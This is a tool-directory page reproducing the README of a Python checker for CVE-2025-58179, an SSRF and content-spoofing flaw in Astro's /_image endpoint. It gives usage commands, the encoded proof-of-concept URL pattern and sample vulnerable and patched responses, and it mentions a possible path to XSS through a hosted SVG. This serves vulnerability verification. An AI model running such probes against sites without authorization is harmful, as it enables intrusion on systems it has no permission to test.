Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-58179-Check — Python script to verify SSRF and content spoofing vulnerabilities (CVE-2025-58179) in Astro's `/_image` endpoint, with automated PoC URL generation and HTTP response verification. | Kitploit
Tools/GitHubGitHub/shitodcy/cve-2025-58179-check
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

Python script to verify SSRF and content spoofing vulnerabilities (CVE-2025-58179) in Astro's `/_image` endpoint, with automated PoC URL generation and HTTP response verification.

View Repository
1910 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-58179-Check

CVE-2025-58179-Check is a simple Python script to verify SSRF (Server-Side Request Forgery) / Content Spoofing vulnerability on the /_image endpoint in the Astro framework.

This vulnerability is tracked as GHSA-qpr4-c339-7vq8 and CVE-2025-58179.

Vulnerability Background

This vulnerability impacts Astro sites using the @astrojs/cloudflare adapter with output: 'server' configuration. The /_image endpoint, which is supposed to optimize images, fails to properly validate the href parameter.

This allows an attacker to make the server fetch and serve content from any unauthorized external domain. The impact can be SSRF, and if the external content is a malicious file (such as an SVG containing a script), this can lead to Cross-Site Scripting (XSS).

This script automates the testing process to check if a site is vulnerable to this issue.

Features

  • Automatically generates correctly formatted PoC (Proof of Concept) URLs.
  • Performs HTTP verification (optional) to check server response.
  • Color-codes output for easier analysis (Status Code, Result).
  • Detects vulnerable responses (e.g., Status 200 with Content-Type: image/*).

Requirements

  • Python 3
  • requests library (only if using verification functionality)

You can install requests using pip:

pip install requests

Usage

  1. Clone this repository or copy the CVE-2025-58179-Check.py script.
  2. Make sure the script is executable (if needed): chmod +x CVE-2025-58179-Check.py

1. Generate URL Only (Without Verification)

This option will only print the encoded PoC URL. Useful if you want to test manually in a browser or with other tools.

Command:

python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>

Example:

python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)

Output:

[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

2. Generate URL and Perform HTTP Verification

This option will generate the URL and immediately send an HTTP GET request to verify the server response.

Command:

python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r

Example:

python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request

Example Verification Output

Example Result: Vulnerable

If the server returns a 200 status code and the content type is an image, this indicates the server has fetched and served external content.

[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!

Example Result: Not Vulnerable (Patched)

A server that has been patched or properly configured will reject requests to unauthorized external domains, usually by returning a 4xx status.

[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible

[!WARNING] WARNING

  • This script is created for educational purposes and legitimate security testing.
  • Users are fully responsible for their actions. Do not use this script on systems you do not have permission to test.
Download Tool